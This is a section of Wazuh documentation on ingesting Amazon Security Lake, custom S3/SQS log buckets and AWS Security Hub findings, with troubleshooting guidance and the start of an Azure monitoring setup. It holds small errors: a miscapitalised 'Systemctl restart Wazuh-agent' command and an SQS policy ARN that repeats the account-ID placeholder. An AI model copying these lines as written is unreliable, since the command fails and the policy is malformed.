      <skip_on_error>yes</skip_on_error>
      <bucket type="nlb">
        <name><WAZUH_AWS_BUCKET></name>
        <path>NLB</path>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    
  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Amazon Security Lake

Note

This document guides you through setting up Wazuh as a subscriber to AWS Security Lake data. To configure Wazuh as a source for Amazon Security Lake, refer to Amazon Security Lake integration

Amazon Security Lake is a fully-managed security data lake service that consolidates data from multiple AWS and other services, optimizing storage costs and performance at scale.

All logs in Amazon Security Lake use the Open Cybersecurity Schema Framework (OCSF) standard for formatting. You can use the Wazuh integration for Amazon Security Lake to ingest security events from AWS services.

These events are available as multi-event Apache Parquet objects in an S3 bucket. Each object has a corresponding SQS message, once it's ready for download.

Wazuh periodically checks for new SQS messages, downloads new objects, converts the files from Parquet to JSON, and indexes each event into the Wazuh indexer. To set up the Wazuh integration for Amazon Security Lake as a subscriber, you need to do the following:

  1. Create a subscriber in Amazon Security Lake.

  2. Set up the Wazuh integration for Amazon Security Lake.

AWS configuration

The following sections cover how to configure the Amazon Security Lake service to integrate with Wazuh.

Enabling Amazon Security Lake

If you haven't already, ensure that you have enabled Amazon Security Lake by following the instructions at Getting started - Amazon Security Lake.

For multiple AWS accounts, we strongly encourage you to use AWS Organizations and set up Amazon Security Lake at the Organization level.

Creating a Subscriber in Amazon Security Lake

After completing all required AWS prerequisites, configure a subscriber for Amazon Security Lake via the AWS console. This creates the resources you need to make the Amazon Security Lake events available for consumption in your Wazuh platform deployment.

Setting up a subscriber in the AWS Console
Logging in and navigating
  1. Log into your AWS console and navigate to Security Lake.

  2. Navigate to Subscribers, and click Create subscriber.

Creating a subscriber
  1. Enter a descriptive name for your subscriber. For example, Wazuh.

  2. Enter the AWS account ID for the account you are currently logged into.

  3. Enter a unique value in External ID. For example, WAZUH-EXTERNAL-ID-VALUE.

  4. Choose to either collect all log and event sources, or only specific log and event sources.

  5. Select S3 as your data access method.

  6. Under S3 notification type select SQS queue.

  7. Click the Create button to get to the Subscribers pages.

Reviewing the subscriber
  1. Navigate to My subscribers section, and click on your newly created subscriber to get to the Subscriber details page.

  2. Check that AWS created the subscriber with the correct parameters.

  3. Save the SQS queue name. You need the name of the Subscription endpoint for later on when verifying the information in the SQS queue.

Verifying information in SQS Queue

Follow these steps in your Amazon deployment to verify the information for the SQS Queue that Security Lake creates.

  1. In your AWS console, navigate to the Amazon Simple Queue Service.

  2. In the Queues section, navigate to the queue that Security Lake created. Click on its name.

  3. In the information page for the queue, click on the Monitoring tab. Verify that events are flowing in by looking at the Approximate Number Of Messages Visible graph and confirming the number is increasing.

Verifying events are flowing into S3 bucket

Follow these steps in your Amazon deployment to verify that parquet files are flowing into your configured S3 buckets.

  1. In your AWS console, navigate to the Amazon S3 service.

  2. Navigate to the Buckets section, and click on the S3 bucket name that Security Lake created for each applicable region. These bucket names start with the prefix aws-security-data-lake.

  3. In each applicable bucket, navigate to the Objects tab. Click through the directories to verify that Security Lake has available events flowing into the S3 bucket. Check that new files with the .gz.parquet extension appear.

    • If you enabled Security Lake on more than one AWS account, check if you see each applicable account number listed. Check that parquet files exist inside each account.

  4. In each applicable S3 bucket, navigate to the Properties tab and verify in the Event notifications section that the data destination is the Security Lake SQS queue.

Policy configuration

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are used.

Configuring the role

Follow these steps to modify the Security Lake subscriber role. You have to associate an existing user with the role.

  1. In your AWS console, navigate to the Amazon IAM service.

  2. In your Amazon IAM service, navigate to the Roles page.

  3. In the Roles page, select the Role name of the subscription role notification that was created as part of the Security Lake subscriber provisioning process.

  4. In the Summary page, navigate to the Trust relationships tab to modify the Trusted entity policy.

  5. Modify the Trusted entity policy with the following updates:

    • In the stanza containing the ARN, attach the username from your target user account to the end of the ARN. This step connects a user to the role. It lets you configure the Security Lake service with the secret access key. See the following Trusted entity example:

    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "1",
                "Effect": "Allow",
                "Principal": {
                    "AWS": "arn:aws:iam::<ACCOUNT_ID>:user/<USERNAME>"
                },
                "Action": "sts:AssumeRole",
                "Condition": {
                        "StringEquals": {
                            "sts:ExternalId": [
                                "<WAZUH-EXTERNAL-ID-VALUE>"
                            ]
                        }
                }
            }
        ]
    }
    

    Note

    <ACCOUNT_ID>, <USERNAME> and <WAZUH-EXTERNAL-ID-VALUE> are placeholders. Replace them with the appropriate values.

Granting user permission to switch roles

Follow these steps to configure the user permissions:

  1. In your Amazon IAM service, navigate to the Users page.

  2. In the Users page, select the Username of the user you have connected to the role (<USERNAME>).

  3. Replace <ACCOUNT_ID> and <RESOURCE_ROLE> with the appropriate values and add the following permission to switch to the new role:

    Note that <RESOURCE_ROLE> is the name of the subscription role that was created as part of the Security Lake subscriber provisioning process.

    {
        "Version": "2012-10-17",
        "Statement": [
            {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": "sts:AssumeRole",
            "Resource": "arn:aws:iam::<ACCOUNT_ID>:role/<RESOURCE_ROLE>"
            }
        ]
    }
    
Parameters

The following fields inside the /var/ossec/etc/ossec.conf file on the Wazuh server or agent section allow you to configure the queue and authenticate:

Queue configuration
Authentication
  • <iam_role_arn>: Amazon Resource Name (ARN) for the corresponding IAM role to assume.

  • <external_id>: External ID to use when assuming the role.

  • <aws_profile>: A valid profile name from a Shared Credential File or AWS Config File with permissions to access the service. By default, the integration uses the settings found in the default profile. For this configuration, we use the dev profile. Replace it with the appropriate profile defined in your credential file.

  • <iam_role_duration> - Optional: The session duration in seconds.

  • <sts_endpoint> - Optional: The URL of the VPC endpoint of the AWS Security Token Service.

More information about the different authentication methods can be found in the Configuring AWS credentials documentation.

Configure Wazuh to process Amazon Security Lake logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration block to enable the integration with Amazon Security Lake.

    <wodle name="aws-s3">
        <disabled>no</disabled>
        <interval>1h</interval>
        <run_on_start>yes</run_on_start>
        <subscriber type="security_lake">
            <sqs_name>sqs-security-lake-main-queue</sqs_name>
            <iam_role_arn>arn:aws:iam::xxxxxxxxxxx:role/ASL-Role</iam_role_arn>
            <iam_role_duration>1300</iam_role_duration>
            <external_id><WAZUH-EXTERNAL-ID-VALUE></external_id>
            <aws_profile>dev</aws_profile>
            <sts_endpoint>xxxxxx.sts.region.vpce.amazonaws.com</sts_endpoint>
            <service_endpoint>https://bucket.xxxxxx.s3.region.vpce.amazonaws.com</service_endpoint>
        </subscriber>
    </wodle>
    
  3. After setting the required parameters, restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      

Note

The Wazuh module for AWS execution time varies depending on the number of notifications present in the queue. This affects the time to display alerts on the Wazuh dashboard. If the <interval> value is less than the execution time, the Interval overtaken message appears in the /var/ossec/logs/ossec.log file.

Visualizing alerts in Wazuh dashboard

Once you set the configuration and restart the manager, you can visualize the Amazon Security Lake alerts on the Wazuh dashboard. To do this, go to the Threat Hunting module. Apply the filter rule.groups: amazon_security_lake for an easier visualization.

Custom Logs Buckets

Amazon Simple Queue Service (Amazon SQS) is a fully managed message queuing service. It offers secure, durable, and available hosted queues to decouple and scale software systems and components. It allows sending, storing, and receiving messages between software components at any volume, without losing messages or requiring other services to be available. These features make it an optimal component to associate with Amazon S3 buckets to consume any type of log.

Combining Amazon SQS with Amazon S3 buckets allows Wazuh to collect JSON, CSV, and plain text logs from any custom path. The origin of these logs don't even need to be AWS.

Note

To properly process CSV logs, they must include column headers.

To set up the Wazuh integration for Custom Logs Buckets, you need to do the following:

  1. Create an AWS SQS Queue.

  2. Configure an S3 bucket. For every object creation event, the bucket sends notifications to the queue.

AWS configuration

The following sections cover how to configure Custom Logs Buckets to integrate with Wazuh.

Amazon Simple Queue Service
  1. Set up a Standard type SQS Queue with the default configurations. You can apply an Access Policy similar to the following example, where <REGION>, <ACCOUNT_ID>, <SQS-NAME>, and <S3-BUCKET> are the region, account ID, the SQS Queue name, and the name you are going to provide to the S3 bucket.

    {
    "Version": "2012-10-17",
    "Id": "example-ID",
    "Statement": [
      {
        "Sid": "example-access-policy",
        "Effect": "Allow",
        "Principal": {
          "Service": "s3.amazonaws.com"
        },
        "Action": "SQS:SendMessage",
        "Resource": "arn:aws:sqs:<REGION>:<ACCOUNT_ID>:<SQS-NAME>",
        "Condition": {
          "StringEquals": {
            "aws:SourceAccount": "<ACCOUNT_ID>"
          },
          "ArnLike": {
            "aws:SourceArn": "arn:aws:s3:*:*:<S3-BUCKET>"
          }
        }
      }
    ]
    }
    

You can make your access policy to accept S3 notifications from different account IDs and to apply different conditions. More information in Managing access in Amazon SQS.

Amazon S3 and Event Notifications

To configure an S3 bucket that reports creation events, do the following.

  1. Configure an S3 bucket as defined in the configuring an S3 bucket section. Provide the name you decided in the previous section.

  2. Once created, go to Event notifications inside the Properties tab. Select Create event notification.

  3. In Event Types, select All object create events. This generates notifications for any type of event that results in the creation of an object in the bucket.

  4. In the Destination section, select the following options:

    • SQS queue

    • Choose from your SQS queues

  5. Choose the queue you created previously.

Configuration parameters

Configure the following fields to set the queue and authentication configuration. For more information, check the subscribers reference.

Queue
  • <sqs_name>: The name of the queue.

  • <service_endpoint>Optional: The AWS S3 endpoint URL for data downloading from the bucket. Check Using VPC and FIPS endpoints for more information about VPC and FIPS endpoints.

Authentication

The available authentication methods are the following:

These authentication methods require using the /root/.aws/credentials file to provide credentials. You can find more information in configuring AWS credentials.

The available authentication configuration parameters are the following:

Configure Wazuh to process logs from Custom Logs Buckets

Warning

Every message sent to the queue is read and deleted. Make sure you only use the queue for bucket notifications.

  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the SQS name and your configuration parameters for the buckets service. Set this inside <subscriber type="buckets">. For example:

    <wodle name="aws-s3">
        <disabled>no</disabled>
        <interval>1h</interval>
        <run_on_start>yes</run_on_start>
        <subscriber type="buckets">
            <sqs_name>sqs-queue</sqs_name>
            <aws_profile>default</aws_profile>
        </subscriber>
    </wodle>
    

    Check the Wazuh module for AWS reference manual to learn more about the available settings.

Note

The amount of notifications present in the queue affects the execution time of the Wazuh module for AWS. If the <interval> value for the waiting time between executions is too short, the interval overtaken warning is logged into the /var/ossec/logs/ossec.log file.

  1. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
AWS Security Hub

AWS Security Hub automates security best practice checks and aggregates insights to help users understand their overall security posture across multiple AWS accounts. Security Hub helps users assess their compliance against security best practices. It achieves this by:

  • Running checks against security controls.

  • Generating control findings.

  • Grouping related findings into collections called insights.

You need to perform the following to set up the integration that allows you to receive Security Hub events on your Wazuh environment:

  1. Configure your AWS environment. This involves:

    • Enabling Amazon Security Hub. There are two methods to enable Amazon Security Hub in your environment. Please see the enabling Security Hub section.

    • Creating a Firehose stream: The Amazon EventBridge is a serverless event bus service that makes it easy to connect applications using events from AWS services, integrated SaaS applications, and custom sources in real-time. EventBridge needs a target such as the Firehose stream. It triggers the target when it receives an event matching an event pattern defined in the rule.

    • Integrating Security Hub with EventBridge: EventBridge allows storing Security Hub findings and insights in S3 buckets.

    • Enabling an Amazon S3 bucket to include event notifications: The bucket sends notifications to the queue for every Security Hub object creation event.

    • Enabling an Amazon SQS queue: The Amazon Simple Queue Service (SQS) is a message queuing service that enables decoupled communication between AWS components. The Wazuh module for AWS will query the SQS for notifications of created logs in S3 and generate alerts from Security Hub logs.

  2. Configure the Wazuh module for AWS to receive Amazon Security Hub events.

Amazon configuration
Enabling Security Hub

Search for the “Security Hub” using the AWS console search bar to determine the best method that suits your environment. There are two ways to enable AWS Security Hub:

  • Manual Integration: We recommend this method for standalone accounts with a single organization. The screenshot below shows how to enable AWS Security Hub using the AWS Security Hub console. Please follow the enabling Security Hub manually guideline to find other methods to enable the AWS Security Hub.

    Enable AWS Security Hub
  • Organizations integration: We recommend this method for multi-account and multi-region environments. Your organization must have a delegated administrator account. Please follow the enabling Security Hub with organizations integration guidelines to set your AWS Security Hub using this method.

Creating a Firehose stream

The Amazon Firehose stream serves as the channel for sending the AWS Security Hub logs to the S3 bucket. Follow the steps below to create an Amazon Firehose stream for your Amazon Security Hub logs.

  1. Go to the Amazon Data Firehose service and click Create Firehose stream.

    Create Firehose stream
  2. Select Direct PUT as the source and Amazon S3 as the destination.

    Create Firehose stream
  3. Choose or create your proposed Amazon S3 bucket. You can use an Amazon S3 bucket prefix, but this is optional.

    Create Firehose stream
  4. Click Create Firehose stream.

Integrating Security Hub with EventBridge

Integrating Security Hub with EventBridge enables the storage of Security Hub events in S3 buckets.

There are three types of events available, each using a specific Eventbridge event format. The Wazuh integration takes every relevant detail and detail-type value from them.

  • Security Hub Findings - Imported: Security Hub automatically sends events of this type to EventBridge. They include new findings and updates to existing findings, each containing a single finding.

  • Security Hub Findings - Custom Action: When you trigger custom actions, Security Hub sends these events to EventBridge. The custom actions associate the events with their findings.

  • Security Hub Insight Results: This event processes the Security Hub Insights. You can use custom actions to send sets of insight results to EventBridge. Insight results are the resources that match an insight.

To send the last two types of events to EventBridge, you need to create a custom action in Security Hub. Please refer to the Amazon Security Hub documentation to achieve this. Find more information about the types of Security Hub integration with EventBridge.

To integrate Security Hub with EventBridge, you must create an event rule in EventBridge.

  1. Go to the Amazon EventBridge and create a new EventBridge rule.

    Create EventBridge rule
  2. Enter a name for the rule and select Rule with an event pattern. Then click on Next.

    Create EventBridge rule
  3. Scroll down to Event pattern. Select Security Hub as the AWS service and All Events in the Event type. Then click on Next.

    Create EventBridge rule
  4. Select Firehose stream as the target, and use the Firehose stream you created in the previous section. Click on Next.

    Create EventBridge rule
  5. Leave the other default options and create the EventBridge rule.

The AWS documentation provides steps to configure an EventBridge rule for AWS Security Hub.

Amazon S3 bucket with event notifications

Follow the steps below to configure an S3 bucket that reports the creation of events.

  1. Configure an S3 bucket as defined in the configuring an AWS S3 Bucket section. Provide the name you decided in the previous section.

  2. Go to Event notifications inside the Properties tab. Select Create event notification.

  3. Select All object create events in Event Types. This generates notifications for any event that creates an object in the bucket.

  4. Select SQS queue in the Destination section.

  5. Select Choose from your SQS queues. Then, choose the queue you created previously.

Amazon Simple Queue Service

Amazon Simple Queue Service is a fully managed message queuing service that makes it easy to decouple and scale microservices, distributed systems, and serverless applications.

In this case, it acknowledges new events to pull from the S3 bucket.

  1. Set up a Standard type SQS Queue with the default configurations. You can apply an access policy similar to the following example, where <REGION>, <AWS_ACCOUNT_ID>, <S3_BUCKET>, <YOUR_SQS_QUEUE_NAME> are your region, account ID, S3 bucket name, and SQS queue name.

    {
    "Version": "2012-10-17",
    "Id": "SecurityHub-ID",
    "Statement": [
      {
        "Sid": "example-access-policy",
        "Effect": "Allow",
        "Principal": {
          "Service": "s3.amazonaws.com"
        },
        "Action": "SQS:SendMessage",
        "Resource": "arn:aws:sqs:<REGION>:<AWS_ACCOUNT_ID>:<AWS_ACCOUNT_ID>:<YOUR_SQS_QUEUE_NAME>",
        "Condition": {
          "StringEquals": {
            "aws:SourceAccount": "<AWS_ACCOUNT_ID>"
          },
          "ArnLike": {
            "aws:SourceArn": "arn:aws:s3:*:*:<S3_BUCKET>"
          }
        }
      }
    ]
    }
    

    The other settings related to this configuration are:

    • "Version" specifies the version of the policy language being used, in this case, the version from 2012-10-17.

    • "Id" is a unique identifier for this policy.

    • "Statement" is an array that contains the individual permission statements for this policy.

    • "Sid" is an optional identifier that provides a way to give the statement a unique name.

    • "Effect" defines whether the statement results in an "Allow" or "Deny" for the specified actions.

    • "Principal" specifies the AWS service or account allowed to access the resource, in this case, the "s3.amazonaws.com" service.

    • "Action" specifies the action that is allowed or denied, in this case, "SQS", which allows sending messages to an SQS queue.

    • "Condition" specifies conditional elements that must be met for the policy to take effect.

    • "Resource" is the ARN of your SQS queue.

    • "aws:SourceAccount" is your AWS account ID.

    • "aws:SourceArn" is the ARN of the Amazon S3 bucket created for your Amazon Security Hub logs.

  2. You can set your access policy to accept S3 notifications from different account IDs and apply different conditions. For more information, see managing access in Amazon SQS.

Wazuh configuration
Authentication

The available authentication methods are the following:

These authentication methods require providing credentials using the /root/.aws/credentials file. For more information, see configuring AWS credentials.

Configuration

You can perform the following configuration on the Wazuh server or Linux-based Wazuh agent.

  1. Edit the /var/ossec/etc/ossec.conf file. Add the SQS name within the <sqs_name> tag. For example:

    <wodle name="aws-s3">
        <disabled>no</disabled>
        <interval>1h</interval>
        <run_on_start>yes</run_on_start>
        <subscriber type="security_hub">
           <sqs_name>YOUR_SQS_QUEUE_NAME</sqs_name>
           <aws_profile>YOUR_AWS_CREDENTIAL_PROFILE</aws_profile>
       </subscriber>
    </wodle>
    

    Where:

    • <interval> is the time taken between each log pull.

    • <run_on_start> pulls AWS Security Hub logs each time the Wazuh server starts.

    • <subscriber type="security_hub"> are the added tags to obtain AWS Security Hub logs.

    • <sqs_name> is the name of the Amazon SQS queue created in the previous section.

    Optional

    • <service_endpoint> – The AWS S3 endpoint URL for data downloading from the bucket. Check using non-default AWS endpoints for more information about VPC and FIPS endpoints.

  2. Restart the Wazuh server or agent to apply the changes.

    • Wazuh server:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # Systemctl restart Wazuh-agent
      

Check the AWS S3 module reference to learn more about the available settings. Configure the following fields to set the queue and authentication configuration. For more information, check the subscriber’s reference.

Warning

Every message sent to the queue is read and deleted. Make sure you only use the queue for bucket notifications.

Visualizing the events

You can view these logs via the Threat Hunting dashboard of the agent you configured your Wazuh module for AWS.

The following dashboard shows the top 5 AWS Security Hub alerts discovered within 90 days.

Create EventBridge rule

The image below shows an event with a high severity.

Create EventBridge rule
Troubleshooting

The below information is intended to assist in troubleshooting issues.

Checking if the Wazuh module for AWS is running

When the Wazuh module for AWS runs it writes its output in the ossec.log file. This log file can be found in /var/ossec/logs/ossec.log and under Server Management > Logs if you use the Wazuh dashboard. It is possible to check if the Wazuh module for AWS is running without issues by looking in the /var/ossec/logs/ossec.log file. These are the messages that are displayed in the file depending on how the Wazuh module for AWS has been configured:

  • When the Wazuh module for AWS is starting:

    2022/03/04 00:00:00 wazuh-modulesd:aws-s3: INFO: Module AWS started
    2022/03/04 00:00:00 wazuh-modulesd:aws-s3: INFO: Starting fetching of logs.
    
  • When Scheduled scan is set:

    2022/03/04 00:00:00 wazuh-modulesd:aws-s3: INFO: Starting fetching of logs.
    2022/03/04 00:00:00 wazuh-modulesd:aws-s3: INFO: Fetching logs finished.
    
  • When the Wazuh module for AWS has finished its execution and is waiting until the interval condition is met:

    2022/03/04 00:00:00 wazuh-modulesd:aws-s3: INFO: Fetching logs finished.
    
Enabling debug mode

It is possible to obtain additional information about the Wazuh module for AWS execution by enabling the debug mode. This is used to see INFO or DEBUG messages. There are three different debug levels available:

  • Debug level 0: Only ERROR and WARNING messages are written in the /var/ossec/logs/ossec.log file. This is the default value.

  • Debug level 1: In addition to ERROR and WARNING messages, INFO messages are written in the /var/ossec/logs/ossec.log file too. They are useful to check the execution of the module without having to manage large amounts of DEBUG messages.

  • Debug level 2: This is the highest level of verbosity. Every message type is dump into the /var/ossec/logs/ossec.log file, including DEBUG messages which contain the details of the different operations performed by the Wazuh module. This is the recommended mode when troubleshooting the Wazuh module for AWS.

Follow these steps to enable debug mode:

  1. Add the following line to the /var/ossec/etc/local_internal_options.conf file of the Wazuh server or agent, specifying the desired debug level:

    wazuh_modules.debug=2
    
  2. Restart the Wazuh service.

    Wazuh manager

    # systemctl restart wazuh-manager
    

    Wazuh agent

    # systemctl restart wazuh-agent
    

Note

Don't forget to disable debug mode once the troubleshooting has finished. Leaving debug mode enabled could result in the addition of large amounts of logs in the /var/ossec/logs/ossec.log file.

Checking if logs are being processed

The easiest way to check if the logs are being processed, regardless of the type of bucket or service configured and regardless of whether alerts are being generated or not is by using the logall_json parameter.

To understand how the logall_json parameter works it is necessary to learn about the flow that is followed when processing a log until the corresponding alert is displayed on the Wazuh dashboard. It is as follows:

  1. The Wazuh module for AWS downloads the logs available in AWS for the requested date and path. Check the Considerations for the Wazuh module for AWS configuration page to learn more about how to properly filter the logs.

  2. The content of these logs is sent to the analysis engine in the form of an Event.

  3. The analysis engine evaluates these events and compares them with the different rules available. If the event matches any of the rules an alert is generated, which is what ultimately is shown on the Wazuh dashboard.

With this in mind, it is possible to enable the Wazuh archives using the logall_json option. When this option is activated, Wazuh stores into the /var/ossec/logs/archives/archives.json file every event sent to the analysis engine whether they tripped a rule or not. By checking this file, it is possible to determine if the AWS events are being sent to the analysis engine and therefore the Wazuh module for AWS is working as expected.

Note

Don't forget to disable the logall_json parameter once the troubleshooting has finished. Leaving it enabled could result in high disk space consumption.

Common problems and solutions
Unable to locate credentials

The Wazuh module for AWS does not work and the following error messages appear in the /var/ossec/logs/ossec.log file:

2022/03/03 16:01:48 wazuh-modulesd:aws-s3: WARNING: Bucket:  -  Returned exit code 12
2022/03/03 16:01:48 wazuh-modulesd:aws-s3: WARNING: Bucket:  -  Unable to locate credentials
Solution

No authentication method was provided within the configuration of the Wazuh module for AWS. Check the Configuring AWS credentials section to learn more about the different options available and how to configure them.

Invalid credentials to access S3 Bucket

The Wazuh module for AWS does not work and the following error messages appear in the /var/ossec/logs/ossec.log file:

2022/03/03 16:06:56 wazuh-modulesd:aws-s3: WARNING: Bucket:  -  Returned exit code 3
2022/03/03 16:06:56 wazuh-modulesd:aws-s3: WARNING: Bucket:  -  Invalid credentials to access S3 Bucket
Solution

Make sure the credentials provided grant access to the requested S3 bucket and the bucket itself exists.

The config profile could not be found

The Wazuh module for AWS does not work and the following error messages appear in the /var/ossec/logs/ossec.log file:

2022/03/03 15:49:34 wazuh-modulesd:aws-s3: WARNING: Bucket:  -  Returned exit code 12
2022/03/03 15:49:34 wazuh-modulesd:aws-s3: WARNING: Bucket:  -  The config profile (default) could not be found
Solution

Ensure the profile value specified in the configuration matches an existing one placed in /root/.aws/credentials. Check the Profiles section to learn more about configuring a profile for authentication.

The security token included in the request is invalid

The Wazuh module for AWS does not work and the following error messages appear in the /var/ossec/logs/ossec.log file:

2022/03/03 16:16:18 wazuh-modulesd:aws-s3: WARNING: Service: cloudwatchlogs  -  Returned exit code 12
2022/03/03 16:16:18 wazuh-modulesd:aws-s3: WARNING: Service: cloudwatchlogs  -  An error occurred (InvalidClientTokenId) when calling the GetCallerIdentity operation: The security token included in the request is invalid.
Solution

No credentials were provided to attempt to access to CloudWatch Logs or that the credentials provided don't grant access to CloudWatch Logs. Check the Configuring AWS credentials section to learn more about the different options available and how to configure them.

There are no AWS alerts present on the Wazuh dashboard

The Wazuh module for AWS is running but no alerts are displayed on the Wazuh dashboard.

Solution

First of all, review ERROR or WARNING messages in the /var/ossec/logs/ossec.log file by enabling debug mode. If the Wazuh module for AWS is running as expected but no alerts are being generated it could mean there is no reason for alerts to be raised in first place. Check the following to verify this:

  • Make sure there is data available for the given date.

    When running, the Wazuh module for AWS requests AWS for the logs corresponding to the date indicated using the only_logs_after parameter. If this parameter is not specified, it will try to obtain the logs corresponding to the day of execution. Make sure you are specifying a value for only_logs_after and that there is data available for that particular date. Check the Considerations for the Wazuh module for AWS configuration page to learn more about how to properly filter the logs using the only_logs_after parameter.

  • Check if the events are being sent to the analysis engine.

    A common scenario is that no alerts are being generated because the events do not match any of the available rules. Take a look at the Checking if logs are being processed section to learn how to check if the AWS logs are being sent to the analysis engine.

CloudWatch Logs integration is running but no alert is shown on the Wazuh dashboard

The Wazuh module for AWS is running without any error or warning messages, but no alerts from CloudWatch Logs are displayed on the Wazuh dashboard.

Solution

A common scenario is that no alerts are being generated because the events do not match any of the available rules. Take a look at the Checking if logs are being processed section to learn how to check if the AWS logs are being sent to the analysis engine.

Take into account that Wazuh does not provide default rules for the different logs that can be found in CloudWatch Logs, since they can have any type of format and come from any source. Because of this, if a user wants to make use of this integration to process any custom log they will most likely have to configure their own rules for them. Take a look at the Custom rules section to learn more about this topic.

Interval overtaken message is present in the log file

The Interval overtaken message is present in the /var/ossec/logs/ossec.log file.

Solution

Not an issue but a warning. This means the time the Wazuh module for AWS required to finish the last execution was greater than the interval value defined. It is important to note that the next run will not start until the previous one is finished.

Error codes reference
  1. Errors in the /var/ossec/logs/ossec.log file of the Wazuh server or agent.

    The exit codes and their possible remediation are as follows:

    Code

    Description

    Possible remediation

    1

    Unknown error

    Programming error. Please, open an issue in the Wazuh GitHub repository with the trace of the error.

    2

    SIGINT

    The module stopped due to an interrupt signal.

    3

    Invalid credentials to access S3 bucket

    Make sure that your credentials are correct. For more information, see the Configuring AWS credentials section.

    4

    boto3 module missing

    Install boto3 library. For more information, see the Installing dependencies section.

    5

    Unexpected error accessing SQLite DB

    Check that no more instances of the Wazuh module for AWS are running at the same time.

    6

    Unable to create SQLite DB

    Make sure that the wodle has the right permissions in its directory.

    7

    Unexpected error querying/working with objects in S3

    Check that no more instances of the Wazuh module for AWS are running at the same time.

    8

    Failed to decompress file

    Only .gz and .zip compression formats are supported.

    9

    Failed to parse file

    Ensure that the log file contents have the expected structure.

    10

    pyarrow module missing

    Install pyarrow library. For more information, see the Installing dependencies section.

    11

    Unable to connect to Wazuh

    Ensure that Wazuh is running.

    12

    Invalid type of bucket

    Check if the type of bucket is one of the supported.

    13

    Error sending message to Wazuh

    Make sure that Wazuh is running.

    14

    Empty bucket

    Make sure that the path to the log files is correct.

    15

    Invalid VPC endpoint URL

    Ensure that the VPC endpoint URL provided is correct.

    16

    Throttling error

    AWS is receiving more than 10 requests per second. Try to run the module again when the number of requests to AWS has decreased. For more information see the Connection configuration for retries section.

    17

    Invalid file key format

    Ensure that the file path follows the format specified in the supported services

    18

    Invalid prefix

    Make sure that the indicated path exists in the S3 bucket.

    19

    The server datetime and datetime of the AWS environment differ

    Make sure that the server datetime is correctly set.

    20

    Unable to find SQS

    Make sure that the sqs_name value in the Wazuh module for AWS configuration in the ossec.conf file is correct.

    21

    Failed fetch/delete from SQS

    Check that no more instances of the Wazuh module for AWS are running at the same time.

    22

    Invalid region

    Check the provided region in the ossec.conf file.

    23

    Profile not found

    Check the provided aws_profile in the ossec.conf file.

Monitoring Microsoft Azure with Wazuh

Microsoft Azure is a cloud computing platform by Microsoft that offers a wide range of services, including computing power, storage options, and networking capabilities. It provides solutions for various applications such as virtual computing, analytics, storage, and networking, catering to the diverse needs of businesses and developers. Securing your cloud instance is an essential consideration for companies that use cloud services offered by cloud providers such as Microsoft Azure.

Wazuh, an open source security monitoring platform, offers solutions for collecting and analyzing data generated by security and runtime events within Microsoft Azure environments. Integrating Wazuh with Microsoft Azure enhances the security posture of Azure deployments and ensures compliance with regulatory standards and operational integrity.

This section provides instructions for monitoring Microsoft Azure infrastructures.

Monitoring instances

The Wazuh agent is cross-platform compatible, meaning it can run on various operating systems, such as Windows, Linux, and macOS. It collects data on different systems and applications and ensures the instance benefits from other Wazuh capabilities, such as File Integrity Monitoring (FIM) and Security Configuration Assessment (SCA). This data is sent to the Wazuh server through an encrypted and authenticated channel. A unique pre-shared key registration process establishes this secure channel.

You can install the Wazuh agent on the virtual machines in your Microsoft Azure environment. Monitoring cloud virtual machines using the Wazuh agent is beneficial because it ensures comprehensive security and performance oversight, enabling early detection of potential threats and operational issues in dynamic cloud environments.

Check the Wazuh agent installation and enrollment documentation to learn more about the Wazuh agents. Additionally, read about Wazuh SIEM and XDR capabilities and their configuration in our capabilities documentation.

Monitoring Azure platform and services

The Azure Monitor Logs collects and organizes logs and performance data from monitored resources, including Azure services, virtual machines, and applications. This insight is sent to Wazuh using the Azure Log Analytics REST API or by directly accessing the contents of a Microsoft Azure Storage account. The Wazuh module for Azure enables centralized logging, threat detection, and compliance management of your Microsoft Azure environments from your Wazuh deployment.

The Wazuh module for Azure requires dependencies and credentials to access your Microsoft Azure logs. These dependencies are available by default on the Wazuh manager, but you must install them when you use a Wazuh agent for the integration. Take a look at the Prerequisites section before proceeding.

Prerequisites
Installing dependencies

You can configure the Wazuh module for Azure either in the Wazuh manager or in a Wazuh agent. This choice depends solely on how you access your Azure infrastructure in your environment.

You only need to install dependencies when configuring the integration with Azure in a Wazuh agent. The Wazuh manager already includes all the necessary dependencies.

Python

The Wazuh module for Azure is compatible with Python 3.8–3.13. While later Python versions should work as well, we can't assure they are compatible. If you do not have Python 3 already installed, run the following command on your monitored endpoint.

# apt-get update && apt-get install python3

You can install the required modules with Pip, the Python package manager. Most UNIX distributions have this tool available in their software repositories. Run the following command to install pip on your endpoint if you do not have it already installed.

# apt-get update && apt-get install python3-pip

We recommend using Pip 19.3 or later to simplify the installation of the dependencies. Run this command to check your pip version.

# pip3 --version

An example output is as follows.

pip 22.0.2 from /usr/lib/python3/dist-packages/pip (python 3.10)

If your pip version is less than 19.3, run the following command to upgrade the version.

# pip3 install --upgrade pip
Azure Storage client library for Python

You need the libraries in the command below to set up your Wazuh agent endpoint and monitor your Microsoft Azure platform and services.

# pip3 install azure-storage-blob==12.20.0 azure-storage-common==2.1.0 azure-common==1.1.25 cryptography==3.3.2 cffi==1.14.4 pycparser==2.20 six==1.14.0 python-dateutil==2.8.1 requests==2.25.1 certifi==2022.12.07 chardet==3.0.4 idna==2.9 urllib3==1.26.18 SQLAlchemy==2.0.23 pytz==2020.1
Configuring Azure credentials

